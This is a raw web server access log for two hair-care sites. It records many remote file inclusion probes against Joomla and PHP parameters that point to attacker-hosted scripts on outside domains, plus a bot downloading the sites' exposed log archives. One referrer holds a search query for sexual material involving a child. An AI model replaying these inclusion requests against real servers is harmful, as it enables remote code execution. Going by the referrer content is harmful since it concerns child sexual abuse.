60.251.165.181 - - [12/Jan/2010:06:32:40 -0800] "GET ////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 200 936 "-" "Mozilla/5.0" "www.freehairsecrets.com"
60.251.165.181 - - [12/Jan/2010:06:32:40 -0800] "GET /logs/access.log%20%20/////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:33:15 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:33:15 -0800] "GET /logs/access_091005.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:33:16 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [12/Jan/2010:06:35:51 -0800] "GET /logs/access_090817.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:38:42 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:38:42 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:38:42 -0800] "GET /logs/access_091005.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:38:47 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:40:09 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:40:09 -0800] "GET /logs/access_091005.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:40:09 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.15.39.9 - - [12/Jan/2010:06:41:07 -0800] "GET /logs/access_091207.log HTTP/1.1" 200 748461 "http://www.google.ca/search?hl=en&q=Purebot+logs&start=140&sa=N" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10" "www.growlonghairfast.com"
204.15.39.9 - - [12/Jan/2010:06:41:08 -0800] "GET /logs/ HTTP/1.1" 200 4799 "-" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10" "www.growlonghairfast.com"
204.15.39.9 - - [12/Jan/2010:06:41:12 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.growlonghairfast.com/logs/" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10" "www.growlonghairfast.com"
204.15.39.9 - - [12/Jan/2010:06:41:22 -0800] "GET /logs/access_090817.log HTTP/1.1" 200 1208583 "http://www.growlonghairfast.com/logs/" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:41:26 -0800] "GET /logs/ HTTP/1.1" 200 4799 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:41:42 -0800] "GET /logs/access.log HTTP/1.1" 200 253670 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:41:51 -0800] "GET /logs/access_090706.log HTTP/1.1" 200 2065187 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:41:55 -0800] "GET /logs/access_090713.log HTTP/1.1" 200 581775 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:00 -0800] "GET /logs/access_090720.log HTTP/1.1" 200 590881 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:09 -0800] "GET /logs/access_090727.log HTTP/1.1" 200 533859 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.9 - - [12/Jan/2010:06:42:12 -0800] "GET /logs/access_091207.log HTTP/1.1" 200 748461 "http://www.google.ca/search?hl=en&q=Purebot+logs&start=140&sa=N" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:15 -0800] "GET /logs/access_090803.log HTTP/1.1" 200 840965 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:19 -0800] "GET /logs/access_090810.log HTTP/1.1" 200 784281 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:28 -0800] "GET /logs/access_090817.log HTTP/1.1" 200 1208583 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:32 -0800] "GET /logs/access_090824.log HTTP/1.1" 200 817938 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:39 -0800] "GET /logs/access_090831.log HTTP/1.1" 200 634508 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:44 -0800] "GET /logs/access_090907.log HTTP/1.1" 200 618290 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:48 -0800] "GET /logs/access_090914.log HTTP/1.1" 200 530015 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:54 -0800] "GET /logs/access_090921.log HTTP/1.1" 200 748349 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:42:57 -0800] "GET /logs/access_090928.log HTTP/1.1" 200 579061 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:43:08 -0800] "GET /logs/access_091005.log HTTP/1.1" 200 642979 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:43:11 -0800] "GET /logs/access_091012.log HTTP/1.1" 200 766310 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
60.251.165.181 - - [12/Jan/2010:06:43:19 -0800] "GET /logs/access.log/////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
60.251.165.181 - - [12/Jan/2010:06:43:19 -0800] "GET ////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 200 936 "-" "Mozilla/5.0" "www.freehairsecrets.com"
60.251.165.181 - - [12/Jan/2010:06:43:19 -0800] "GET /logs/////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 200 4815 "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.15.39.12 - - [12/Jan/2010:06:43:21 -0800] "GET /logs/access_091019.log HTTP/1.1" 200 561992 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
80.191.144.32 - - [12/Jan/2010:06:43:22 -0800] "GET /logs/access_091005.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.32 - - [12/Jan/2010:06:43:22 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.32 - - [12/Jan/2010:06:43:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.15.39.12 - - [12/Jan/2010:06:43:22 -0800] "GET /logs/access_091026.log HTTP/1.1" 200 562644 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:43:24 -0800] "GET /logs/access_091102.log HTTP/1.1" 200 696678 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:43:25 -0800] "GET /logs/access_091109.log HTTP/1.1" 200 589584 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:43:27 -0800] "GET /logs/access_091116.log HTTP/1.1" 200 718477 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:43:40 -0800] "GET /logs/access_091123.log HTTP/1.1" 200 1294739 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:43:45 -0800] "GET /logs/access_091130.log HTTP/1.1" 200 674055 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:43:50 -0800] "GET /logs/access_091207.log HTTP/1.1" 200 748461 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:43:59 -0800] "GET /logs/access_091214.log HTTP/1.1" 200 793223 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:44:08 -0800] "GET /logs/access_091221.log HTTP/1.1" 200 760051 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:44:14 -0800] "GET /logs/access_091228.log HTTP/1.1" 200 636872 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:44:18 -0800] "GET /logs/access_100104.log HTTP/1.1" 200 553567 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:44:26 -0800] "GET /logs/access_100111.log HTTP/1.1" 200 1004971 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
204.15.39.12 - - [12/Jan/2010:06:44:29 -0800] "GET /logs/scripts.log HTTP/1.1" 200 1663 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.growlonghairfast.com"
65.23.156.168 - - [12/Jan/2010:06:45:47 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
60.251.165.181 - - [12/Jan/2010:06:47:01 -0800] "GET /logs/////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 200 4815 "-" "Mozilla/5.0" "www.freehairsecrets.com"
60.251.165.181 - - [12/Jan/2010:06:47:01 -0800] "GET ////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 200 936 "-" "Mozilla/5.0" "www.freehairsecrets.com"
60.251.165.181 - - [12/Jan/2010:06:47:01 -0800] "GET /logs/access.log%20%20/////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
60.251.165.181 - - [12/Jan/2010:06:49:01 -0800] "GET /logs/access.log/////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
60.251.165.181 - - [12/Jan/2010:06:49:01 -0800] "GET ////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 200 936 "-" "Mozilla/5.0" "www.freehairsecrets.com"
60.251.165.181 - - [12/Jan/2010:06:49:01 -0800] "GET /logs/////////////?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 200 4815 "-" "Mozilla/5.0" "www.freehairsecrets.com"
196.40.83.71 - - [12/Jan/2010:06:51:41 -0800] "GET ////////////?_SERVER[DOCUMENT_ROOT]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 200 936 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:52:04 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:52:04 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:52:04 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:53:03 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:53:03 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:06:53:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:07:01:20 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:07:01:20 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:07:01:20 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:07:02:37 -0800] "GET /logs/access_091005.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:07:03:59 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:07:03:59 -0800] "GET /logs/access.log%20%20/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:07:03:59 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:07:04:02 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:07:04:02 -0800] "GET /logs/access.log%20%20/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:07:04:02 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.125.20.167 - - [12/Jan/2010:07:04:34 -0800] "GET /freehairsecretsphp/docs/CHANGELOG.html HTTP/1.1" 200 45364 "-" "-" "growlonghairfast.com"
203.124.149.168 - - [12/Jan/2010:07:11:43 -0800] "GET /logs/access.log/?sourcedir=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [12/Jan/2010:07:11:43 -0800] "GET /?sourcedir=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.124.149.168 - - [12/Jan/2010:07:11:48 -0800] "GET /logs/?sourcedir=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:07:12:53 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:07:12:53 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:07:12:53 -0800] "GET /logs/access_091005.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.103.72.130 - - [12/Jan/2010:07:15:58 -0800] "GET /?sourcedir=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.103.72.130 - - [12/Jan/2010:07:15:58 -0800] "GET /logs/?sourcedir=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.103.72.130 - - [12/Jan/2010:07:15:58 -0800] "GET /logs/access.log/?sourcedir=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.112.249 - - [12/Jan/2010:07:16:39 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.112.249 - - [12/Jan/2010:07:16:41 -0800] "GET /freehairsecretsphp/viewtopic.php?p=5469 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
218.25.99.135 - - [12/Jan/2010:07:27:23 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
60.217.248.143 - - [12/Jan/2010:07:27:28 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
60.217.248.143 - - [12/Jan/2010:07:27:30 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
200.238.83.49 - - [12/Jan/2010:07:27:32 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
60.217.248.134 - - [12/Jan/2010:07:27:34 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
60.217.248.134 - - [12/Jan/2010:07:27:42 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
202.108.50.76 - - [12/Jan/2010:07:27:44 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
222.116.210.143 - - [12/Jan/2010:07:27:48 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
202.108.50.76 - - [12/Jan/2010:07:27:51 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
129.194.8.73 - - [12/Jan/2010:07:27:55 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
222.116.210.143 - - [12/Jan/2010:07:27:59 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
202.108.50.76 - - [12/Jan/2010:07:28:02 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
123.125.156.131 - - [12/Jan/2010:07:28:04 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
203.81.81.36 - - [12/Jan/2010:07:28:20 -0800] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "www.freehairsecrets.com"
67.195.112.249 - - [12/Jan/2010:07:39:14 -0800] "GET /logs/?S=A HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
114.58.242.71 - - [12/Jan/2010:07:45:25 -0800] "GET /freehairsecretsphp/viewtopic.php?p=11412 HTTP/1.1" 200 349 "http://search.yahoo.com/search?p=preteen+daughter+dad+incest+manga&fr=yfp-t-701&fr2=sb-bot&xargs=0&pstart=1&b=11&xa=LT8Ano21fT1DAPQVoDpQog--,1263397417" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "growlonghairfast.com"
114.58.242.71 - - [12/Jan/2010:07:45:26 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "growlonghairfast.com"
174.120.18.66 - - [12/Jan/2010:07:45:29 -0800] "HEAD / HTTP/1.1" 200 0 "http://naturalhairremedies.info" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.freehairsecrets.com"
80.191.144.32 - - [12/Jan/2010:07:52:18 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.32 - - [12/Jan/2010:07:52:18 -0800] "GET /logs/access_091005.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
80.191.144.32 - - [12/Jan/2010:07:52:18 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.152.12.49 - - [12/Jan/2010:08:01:25 -0800] "GET / HTTP/1.1" 200 926 "http://www.google.com.pk/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ShopperReports 3.0.243.0; SRS_IT_E8790072B17659533FA099; Seekmo 11.0.96.0)" "growlonghairfast.com"
124.115.6.16 - - [12/Jan/2010:08:03:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
78.159.32.218 - - [12/Jan/2010:08:04:20 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://community.fitnessanywhere.com/members/Order_5F00_AcTos_5F00_Online.aspx" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.freehairsecrets.com"
78.159.32.218 - - [12/Jan/2010:08:04:20 -0800] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.freehairsecrets.com"
93.174.93.141 - - [12/Jan/2010:08:11:50 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "growlonghairfast.com"
93.174.93.141 - - [12/Jan/2010:08:11:51 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "growlonghairfast.com"
217.114.224.89 - - [12/Jan/2010:08:59:37 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:09:08:01 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
